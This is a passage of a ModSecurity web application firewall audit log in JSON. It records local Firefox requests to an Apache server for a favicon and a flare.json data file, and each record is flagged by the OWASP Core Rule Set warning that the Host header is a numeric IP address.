\"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcASX8AAQEAAAkYuEEAAAAD\"]"],"stopwatch":{"p1":539,"p2":1209,"p3":65,"p4":390,"p5":93,"sr":20,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:47:05 --0400","transaction_id":"WRcASX8AAQEAAAkYuEIAAAAD","remote_address":"127.0.0.1","remote_port":41700,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcASX8AAQEAAAkYuEIAAAAD\"]"],"stopwatch":{"p1":416,"p2":979,"p3":45,"p4":269,"p5":48,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:50:15 --0400","transaction_id":"WRcBB38AAQEAAAkZ0AgAAAAE","remote_address":"127.0.0.1","remote_port":41708,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 12:47:03 GMT","If-None-Match":"\"107-54f6738077c82\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 12:50:12 GMT","ETag":"\"107-54f674343ea58\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcBB38AAQEAAAkZ0AgAAAAE\"]"],"stopwatch":{"p1":916,"p2":1838,"p3":115,"p4":232,"p5":78,"sr":47,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:50:15 --0400","transaction_id":"WRcBB38AAQEAAAkZ0AkAAAAE","remote_address":"127.0.0.1","remote_port":41708,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcBB38AAQEAAAkZ0AkAAAAE\"]"],"stopwatch":{"p1":455,"p2":893,"p3":45,"p4":372,"p5":51,"sr":20,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:50:15 --0400","transaction_id":"WRcBB38AAQEAAAkZ0AoAAAAE","remote_address":"127.0.0.1","remote_port":41708,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcBB38AAQEAAAkZ0AoAAAAE\"]"],"stopwatch":{"p1":491,"p2":964,"p3":63,"p4":526,"p5":126,"sr":22,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:11:58 --0400","transaction_id":"WRcGHn8AAQEAAAkVV4AAAAAA","remote_address":"127.0.0.1","remote_port":41714,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 12:50:12 GMT","If-None-Match":"\"107-54f674343ea58\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:11:55 GMT","ETag":"\"53a-54f6790ec94c7\"","Accept-Ranges":"bytes","Content-Length":"1338","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcGHn8AAQEAAAkVV4AAAAAA\"]"],"stopwatch":{"p1":783,"p2":1629,"p3":61,"p4":258,"p5":53,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:11:59 --0400","transaction_id":"WRcGH38AAQEAAAkVV4EAAAAA","remote_address":"127.0.0.1","remote_port":41714,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcGH38AAQEAAAkVV4EAAAAA\"]"],"stopwatch":{"p1":722,"p2":1021,"p3":76,"p4":376,"p5":48,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:11:59 --0400","transaction_id":"WRcGH38AAQEAAAkVV4IAAAAA","remote_address":"127.0.0.1","remote_port":41714,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcGH38AAQEAAAkVV4IAAAAA\"]"],"stopwatch":{"p1":642,"p2":1666,"p3":90,"p4":450,"p5":183,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:18:37 --0400","transaction_id":"WRcHrX8AAQEAAAmHBIkAAAAF","remote_address":"127.0.0.1","remote_port":41732,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 13:11:55 GMT","If-None-Match":"\"53a-54f6790ec94c7\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:18:34 GMT","ETag":"\"65-54f67a8b8202b\"","Accept-Ranges":"bytes","Content-Length":"101","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcHrX8AAQEAAAmHBIkAAAAF\"]"],"stopwatch":{"p1":900,"p2":1595,"p3":64,"p4":228,"p5":55,"sr":36,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:18:37 --0400","transaction_id":"WRcHrX8AAQEAAAmHBIoAAAAF","remote_address":"127.0.0.1","remote_port":41732,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname 